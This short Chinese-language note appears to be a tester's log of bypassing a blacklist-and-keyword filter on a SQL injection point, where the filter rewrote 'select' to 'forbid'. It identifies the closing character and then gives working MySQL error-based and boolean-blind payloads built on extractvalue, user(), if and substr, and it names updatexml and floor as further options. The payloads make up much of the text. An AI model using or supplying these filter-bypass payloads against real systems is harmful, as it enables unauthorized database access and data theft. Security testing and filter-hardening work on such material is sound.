今天注入时遇到RD对注入点布置了一层拦截、一层过滤。
拦截基于黑名单,将UNION/AND这些开发能想到的做了拦截。
过滤不知道用的什么,会将关键字转换为 forbid。
经过报错提示,闭合符号是 ")" ,后端SQL逻辑为 a)
and a.area_id in(1,2,3,4)
and a.city_.....
转换器将select转换为了forbid,且不管 加注释还是加尖括号都会转换。
最后用了报错注入 payload
1+extractvalue(1,concat(0x7e,(user()),0x7e))
布尔盲注payload
1+extractvalue(1,if(substr(concat(0x7e,(user()),0x7e),2,1)=0x7e,1,2))
同样的报错注入还有
updatexml
floor